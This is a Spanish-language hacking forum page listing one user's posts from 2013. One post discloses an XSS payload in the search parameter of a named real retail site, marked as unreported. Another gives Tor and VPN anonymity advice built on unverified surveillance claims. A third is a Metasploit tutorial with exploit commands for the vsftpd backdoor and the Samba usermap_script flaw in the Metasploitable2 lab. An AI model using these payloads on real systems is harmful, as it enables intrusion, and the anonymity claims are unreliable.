Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - el capi

#1
Hacking ShowOff / [XSS] Coppel.com
Septiembre 20, 2013, 10:11:47 AM

Path vulnerable: search
Vector: "><script>alert('XSS')</script>"
Reportado: No
Autor: El capi
URL= No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"><script>alert('XSS')</script>&page=5 
#2
Dudas y pedidos generales / Re:Dudas sobre proxy, TOR, e IP
Septiembre 12, 2013, 10:31:39 PM
En cuanto a tu pregunta puedo decirte un par de cosas tor no es 100% seguro numero 1 si quieres evitar el rastreo de los americanos tendrias que configurar los puertos de salida de tor y evitar los paises donde pueden afectarte como USA o UK.
Otro punto interesante a tratar es que tor es facilmente logeable alguien puede crear un nodo y logear todo el trafico que por ahi pase.
Tambien ahora con los escandalos de prism se ha dicho que los americanos pueden desncriptar mas de un 70% de las comunicaciones en tor un ejemplo de esto fue  freedomhost que cuando lo cerraron una gran catidad de sitios se quedaron offline.
Entonces para concluir si buscar el anonimato a traves de tor lamento de decirte que ya no es una opcion segura lo mejor seria usar un vpn y un vpn que este al otro lado del mundo y en un pais donde no haya jurisdiccion o algo similar. :'( :'(
#3
Metasploit tutorial metasplotaible vsftpd
-Me presento soy un una persona mas haciendo tutoriales, soy nuevo en este foro  mi idea es crear un manual completamente español sobre como explotar metasplotaible2 y cada uno de sus servicios ire subiendo a mi sitio de youtube e ire posteando con su debida informacion los tutoriales les dejo el primero , espero ir mejorando y teniendo retroalimentacion del foro.

#####vsftp 2.3.4########
Código: php
> use exploit/unix/ftp/vsftpd_234_backdoor
> set rhost  "ipvictima"
> show payloads
> set payload  cmd/unix/interact
> exploit
-- video de youtube


#########samba smbd 3.x (workgroup)puerto 139 445 #####
Código: php
> use multi/samba/usermap_script
> set rhost "ipvitima"
> set rport "puertovictima"
> set payload cmd/unix/bind_ruby
> show options
> set rhost "ipvictima"
> exploit

  ###opcion 2 ### versiones versiones 3.0.20 y 3.0.25 de Samba para usermap
Código: php
> use exploit/unix/webapp/citrix_access_gateway_exec

misma config
video de youtube